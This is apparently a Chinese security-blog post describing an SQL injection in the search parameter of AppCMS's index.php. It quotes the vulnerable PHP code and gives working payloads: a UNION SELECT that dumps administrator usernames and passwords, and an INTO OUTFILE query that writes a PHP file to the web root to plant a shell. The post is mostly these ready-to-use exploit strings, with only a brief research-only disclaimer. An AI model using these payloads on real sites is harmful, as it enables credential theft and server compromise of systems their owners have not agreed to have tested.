index.php
if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) { $str = ''; $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15"; $app_list = $dbm ->query($sql); if (count($app_list['list']) > 0) { foreach ($app_list['list'] as $k => $v){ $app_list['list'][$k]['app_title'] = helper :: utf8_substr($v['app_title'], 0, 20); } echo json_encode($app_list['list']); exit; } else { exit; } }
$_GET['q']直接带入查询
构造:
q=1%'union select 1,uname,upass from appcms_admin_list %23
1%’闭合前面的’% 使like语句完整 #注释掉后面语句 联合查询出数据
Sql语句变成
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list
写shell:
q=1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php' %23
语句变成:
SELECT app_id,app_title,app_down FROM . TB_PREFIX . app_list WHERE app_title LIKE '%1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php'
作者:p0
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论